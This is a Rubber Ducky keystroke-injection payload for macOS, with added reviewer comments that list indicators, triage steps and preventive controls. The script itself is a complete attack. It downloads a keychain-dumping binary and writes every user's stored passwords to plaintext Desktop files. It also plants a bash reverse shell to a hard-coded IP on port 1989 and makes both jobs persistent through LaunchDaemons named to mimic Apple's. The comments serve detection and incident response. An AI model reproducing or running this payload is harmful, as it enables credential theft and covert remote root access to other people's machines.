dump.DUCKY
REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login.
REM
REM Reviewer notes (defensive reading of this payload)
REM   Keystroke-injection script: each STRING/ENTER pair is typed into whatever shell has focus.
REM   Nothing below elevates privileges, so it presumably expects an already-root shell
REM   (the remount of / suggests single-user mode) - TODO confirm.
REM   Both jobs are installed as LaunchDaemons with RunAtLoad, so they are triggered when
REM   launchd loads them, not by a user login session as the line above says.
REM   Neither plist sets UserName, so launchd runs both scripts as root.
REM   On-disk indicators created by this script:
REM     /Library/.hidden/keychaindump  /Library/.hidden/dump.sh  /Library/.hidden/connect.sh
REM     /Library/LaunchDaemons/com.apples.services.plist
REM     /Library/LaunchDaemons/com.apples.remoteservices.plist
REM     <home>/Desktop/<user>.login.keychain.txt
REM   Network indicator: outbound TCP to 120.149.4.142 port 1989.
REM   Triage on a host showing these: unload both launchd labels, remove the files above,
REM   and treat every secret held in the affected login keychains as exposed and rotate it.
REM   Preventive controls to verify: disk encryption and a firmware password (limit
REM   unauthenticated root shells), alerting on new plists in /Library/LaunchDaemons,
REM   and egress filtering.
REM
REM Stage 1: remount the root filesystem (-u update existing mount, -w read-write).
DELAY 100
STRING mount -uw /
ENTER
DELAY 100
REM Stage 2: staging directory; the leading dot keeps it out of default Finder and ls listings.
STRING mkdir /Library/.hidden
ENTER
DELAY 100
REM Stage 3: write /Library/.hidden/dump.sh.
REM   As typed, the script downloads a binary from the raw.githubusercontent.com URL below with
REM   no checksum or signature check, marks it executable, then for each user listed by w -h
REM   resolves the home directory with dscl and redirects the tool's output for that user's
REM   login.keychain into a plaintext file on the Desktop.
REM   The binary is whatever that URL serves at run time; its behaviour cannot be reviewed here.
REM   NOTE(review): the text sits inside a single-quoted echo that itself contains single quotes,
REM   so the file on disk may differ from these lines - inspect the file itself during triage
REM   rather than matching on this exact text.
STRING echo '#!/bin/sh
ENTER
STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/Rainierraoul/duckdump/master/keydumper'
ENTER
STRING chmod +x /Library/.hidden/keychaindump
ENTER
STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc
ENTER
STRING do
ENTER
STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2)
ENTER
STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt
ENTER
STRING done' > /Library/.hidden/dump.sh
ENTER
DELAY 100
STRING chmod +x /Library/.hidden/dump.sh
ENTER
DELAY 100
REM Stage 4: write /Library/.hidden/connect.sh.
REM   Starts an interactive bash with stdin, stdout and stderr attached to a TCP connection
REM   to 120.149.4.142:1989, i.e. a reverse shell to a hard-coded address.
REM   Detection: a bash process whose standard descriptors are a socket; egress to that address.
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/120.149.4.142/1989 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 100
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 100
REM Stage 5: make sure the LaunchDaemons directory exists.
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 100
REM Stage 6: first launchd job, label com.apples.services (imitates Apple's com.apple.* naming).
REM   Runs /bin/sh /Library/.hidden/dump.sh with RunAtLoad.
REM   AbandonProcessGroup=true stops launchd from killing leftover processes in the job's
REM   process group when the job exits.
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/dump.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 100
REM Plist set to mode 644, then loaded immediately.
STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 100
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
REM Stage 7: second launchd job, label com.apples.remoteservices.
REM   Runs /bin/sh /Library/.hidden/connect.sh at load; StartInterval 30 asks launchd to start
REM   the job every 30 seconds, which makes the outbound connection attempt recurring.
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.remoteservices</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>30</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.remoteservices.plist
ENTER
DELAY 100
REM This plist is set to mode 600 (the first one used 644), then loaded.
STRING chmod 600 /Library/LaunchDaemons/com.apples.remoteservices.plist
ENTER
DELAY 100
STRING launchctl load /Library/LaunchDaemons/com.apples.remoteservices.plist
ENTER
DELAY 100
REM Stage 8: immediate reboot.
STRING shutdown -r now
ENTER